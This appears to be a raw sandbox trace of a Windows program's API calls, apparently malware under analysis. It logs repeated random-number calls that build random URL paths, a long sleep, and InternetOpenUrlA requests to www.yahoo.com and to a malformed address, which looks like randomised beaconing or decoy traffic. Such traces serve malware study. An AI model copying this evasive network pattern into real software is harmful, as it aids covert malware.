(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.121] GetProcessHeap () returned 0x440000 [0254.121] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0254.122] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0254.122] lstrcatA (in: lpString1="\x04", lpString2="/sjicjj2X2f1Xdufoxsma9gY1a49i8vkXl9ab/s41ovu6rhsn1U7b8jn63goiq531w0aq/" | out: lpString1="\x04/sjicjj2X2f1Xdufoxsma9gY1a49i8vkXl9ab/s41ovu6rhsn1U7b8jn63goiq531w0aq/") returned="\x04/sjicjj2X2f1Xdufoxsma9gY1a49i8vkXl9ab/s41ovu6rhsn1U7b8jn63goiq531w0aq/" [0254.122] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0254.122] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/sjicjj2X2f1Xdufoxsma9gY1a49i8vkXl9ab/s41ovu6rhsn1U7b8jn63goiq531w0aq/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0254.122] GetProcessHeap () returned 0x440000 [0254.122] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0254.122] GetProcessHeap () returned 0x440000 [0254.122] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b2c0 | out: hHeap=0x440000) returned 1 [0254.122] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0254.122] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0254.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0254.123] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0254.123] Sleep (dwMilliseconds=0x15de9) [0254.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0254.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0254.300] GetProcessHeap () returned 0x440000 [0254.300] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0254.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0254.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0254.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0254.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0254.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e34, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d5e34) returned 0x0 [0254.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0254.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e5a, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x4d5e5a) returned 0x0 [0254.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0254.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e6d, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x4d5e6d) returned 0x0 [0254.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.314] GetProcessHeap () returned 0x440000 [0254.314] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0254.314] lstrcpyA (in: lpString1=0x473b90, lpString2="¹P\x07ºs://www.yahoo.com" | out: lpString1="¹P\x07ºs://www.yahoo.com") returned="¹P\x07ºs://www.yahoo.com" [0254.314] lstrcatA (in: lpString1="¹P\x07ºs://www.yahoo.com", lpString2="/n7cxYfkE5jfgiokMzg/o9Wnsvyo58hvmhPPhM8s139j78omx1x2qX4YY/4e56ciFgd9s4cebxlr/Ubjygfx2rp2mx85Zq/" | out: lpString1="¹P\x07ºs://www.yahoo.com/n7cxYfkE5jfgiokMzg/o9Wnsvyo58hvmhPPhM8s139j78omx1x2qX4YY/4e56ciFgd9s4cebxlr/Ubjygfx2rp2mx85Zq/") returned="¹P\x07ºs://www.yahoo.com/n7cxYfkE5jfgiokMzg/o9Wnsvyo58hvmhPPhM8s139j78omx1x2qX4YY/4e56ciFgd9s4cebxlr/Ubjygfx2rp2mx85Zq/" [0254.314] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0254.314] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="¹P\x07ºs://www.yahoo.com/n7cxYfkE5jfgiokMzg/o9Wnsvyo58hvmhPPhM8s139j78omx1x2qX4YY/4e56ciFgd9s4cebxlr/Ubjygfx2rp2mx85Zq/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0254.314] GetProcessHeap () returned 0x440000 [0254.314] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0254.314] GetProcessHeap () returned 0x440000 [0254.314] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0254.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0254.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0254.315] 